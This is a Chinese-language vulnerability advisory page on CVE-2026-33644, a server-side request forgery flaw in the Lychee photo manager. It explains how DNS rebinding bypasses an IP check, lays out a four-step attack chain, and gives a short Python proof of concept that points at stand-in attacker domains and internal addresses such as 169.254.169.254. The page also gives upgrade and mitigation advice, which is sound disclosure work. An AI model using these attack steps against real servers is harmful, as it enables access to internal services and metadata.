IPBUF安全漏洞报告
English
CVE-2026-33644 CVSS 4.3 中危

CVE-2026-33644 Lychee SSRF漏洞

披露日期: 2026-03-26

漏洞信息

漏洞编号
CVE-2026-33644
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Lychee

相关标签

SSRFLycheeDNS Rebinding信息泄露

漏洞概述

Lychee是一款免费的开源照片管理工具。在7.5.2版本之前,其PhotoUrlRule.php文件中的SSRF防护机制存在安全缺陷。攻击者可以通过DNS重绑定攻击绕过该防护机制。具体而言,当使用域名而非IP地址时,代码中的IP验证检查会被跳过,导致系统未能正确限制请求的目标地址。该漏洞可能被利用来探测内网服务或访问受限资源。官方已在7.5.2版本中修复了此问题,建议受影响用户尽快升级。

技术细节

该漏洞的根本原因在于Lychee的PhotoUrlRule.php文件中对于SSRF的防御逻辑不完整。代码中的IP验证检查逻辑(第86-89行)被包裹在一个条件判断中,该条件判断依赖于filter_var($host, FILTER_VALIDATE_IP)的返回值。只有当输入的$host变量本身是IP地址时,该函数才返回真值,从而触发后续的IP黑名单或白名单校验。当攻击者提供一个域名作为目标地址时,filter_var函数返回假值,导致整个IP验证检查块被跳过。攻击者利用DNS重绑定技术进行攻击:首先,攻击者注册一个域名并将其解析到一个合法的公网IP地址;随后,在服务器发起请求的短时间内(TTL时间内),攻击者更改DNS记录,将该域名重新解析到内网IP地址(如127.0.0.1或169.254.169.254)。由于代码验证逻辑的缺陷,服务器会直接向该内网地址发起请求,从而实现对内网服务的SSRF攻击,可能导致敏感信息泄露。

攻击链分析

STEP 1
步骤1:侦查
识别运行Lychee 7.5.2之前版本的目标服务器。
STEP 2
步骤2:准备攻击环境
攻击者准备一个域名(如attacker.com),并配置DNS服务器使其初始解析为合法IP,随后在极短时间内解析为内网IP(DNS Rebinding)。
STEP 3
步骤3:发送恶意请求
攻击者向Lychee的PhotoUrlRule接口发送请求,参数中使用域名而非IP地址。由于filter_var校验被绕过,服务器接受该域名。
STEP 4
步骤4:执行SSRF
服务器端解析该域名时,DNS记录已变更为内网IP,应用向内网发起请求,导致SSRF攻击成功。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC Concept for CVE-2026-33644 # This script demonstrates how to bypass the IP check by using a domain name # instead of an IP address, leveraging DNS Rebinding. import requests target_url = "http://lychee-instance.com/api/Photo::add" # In a real DNS rebinding attack, 'evil.com' first resolves to a public IP, # then to 127.0.0.1 while the server processes the request. malicious_payload = { "url": "http://attacker-controlled-domain.com" # Domain bypasses filter_var check } try: response = requests.post(target_url, data=malicious_payload) if response.status_code == 200: print("Potential SSRF successful. Server processed the domain.") except Exception as e: print(f"Error: {e}")

影响范围

Lychee < 7.5.2

防御指南

临时缓解措施
建议立即将Lychee升级至7.5.2或更高版本。如果无法立即升级,应在网络层面限制应用服务器的出站访问权限,仅允许访问必要的白名单域名或IP地址,以防止SSRF攻击触达内网敏感资源。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表